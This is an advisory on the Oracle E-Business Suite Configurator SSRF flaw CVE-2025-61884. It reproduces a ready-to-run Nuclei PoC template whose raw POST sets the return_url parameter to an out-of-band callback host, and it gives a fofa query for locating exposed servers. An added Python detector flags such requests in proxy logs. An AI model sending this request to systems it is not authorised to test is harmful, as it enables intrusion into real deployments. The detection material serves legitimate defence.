Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.
PoC code (publicly available):
```yaml
id: CVE-2025-61884

info:
  name: Oracle E-Business Suite - Server-Side Request Forgery
  author: Kazgangap
  severity: high
  description: |
    Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.
  reference:
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884
    - https://nvd.nist.gov/vuln/detail/CVE-2025-61884
    - https://www.oracle.com/security-alerts/alert-cve-2025-61884.html
    - https://arcticwolf.com/resources/blog/cve-2025-61884/
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-61884.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-61884
    cwe-id: CWE-918
    epss-score: 0.34031
    epss-percentile: 0.96774
    cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="E-Business Suite"
  tags: cve,cve2025,oracle,e-business,kev,vkev

http:
  - raw:
      - |
        POST /OA_HTML/configurator/UiServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
        <initialize>
          <param name="init_was_saved">{{to_lower(rand_text_alpha(6))}}</param>
          <param name="return_url">http://{{interactsh-url}}</param>
          <param name="ui_def_id">0</param>
          <param name="config_effective_usage_id">0</param>
          <param name="ui_type">Applet</param>
        </initialize>

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "valid_configuration","terminate")'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4b0a00483046022100f477f72eae3c668860bb1644538589e2d563286286c5d2ec125547ea570e5ba4022100ae5b96f64cc06ff7faed8d279d940799f6a258e31f24ecea1152a86d6374daa3:922c64590222798bb761d5b6d8e72950
```
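The template's request carries the SSRF trigger in the `return_url` parameter of the `getUiType` XML posted to `/OA_HTML/configurator/UiServlet`. As an added defender-side example, not part of the template or of the Kazgangap repository, the Python below flags captured POST bodies for that endpoint whose `return_url` is an absolute URL pointing outside an allowlist of the site's own hosts; the sample bodies, the allowlist host `ebs.example.internal` and the callback host `oob.example` are constructed.

```python
"""Added check (not from the template or the PoC repo): flag captured POSTs to the
Configurator UiServlet whose return_url leaves the site. All sample data is constructed."""
from typing import Optional
from urllib.parse import parse_qs, urlparse
import xml.etree.ElementTree as ET

UISERVLET_PATH = "/OA_HTML/configurator/UiServlet"  # endpoint used by the template


def extract_return_url(body: str) -> Optional[str]:
    """Return the <param name="return_url"> value from the getUiType XML, if present."""
    for xml_doc in parse_qs(body, keep_blank_values=True).get("getUiType", []):
        try:
            root = ET.fromstring(xml_doc.strip())
        except ET.ParseError:
            continue  # malformed XML is not the documented vector; skip it here
        for param in root.iter("param"):
            if param.get("name") == "return_url":
                return (param.text or "").strip()
    return None


def is_offsite_url(url: str, allowed_hosts: set) -> bool:
    """Absolute http(s) URL whose host is not one of ours => SSRF indicator."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False  # a relative or empty return_url is the normal in-app case
    return parsed.hostname.lower() not in allowed_hosts


def flag_request(method: str, path: str, body: str, allowed_hosts: set) -> bool:
    """True when a captured request matches the CVE-2025-61884 SSRF shape."""
    if method.upper() != "POST" or path.split("?", 1)[0] != UISERVLET_PATH:
        return False
    url = extract_return_url(body)
    return url is not None and is_offsite_url(url, allowed_hosts)


# Constructed samples: a probe shaped like the template, and a benign in-app request.
PROBE_BODY = (
    'redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>'
    '<initialize><param name="init_was_saved">abcdef</param>'
    '<param name="return_url">http://oob.example/cb</param>'
    '<param name="ui_def_id">0</param><param name="ui_type">Applet</param></initialize>'
)
BENIGN_BODY = (
    'redirectFromJsp=1&getUiType=<?xml version="1.0"?><initialize>'
    '<param name="return_url">/OA_HTML/OA.jsp?page=home</param></initialize>'
)
```

Feed it request records from a WAF or reverse proxy that logs POST bodies; the access log alone will not show the `return_url` value.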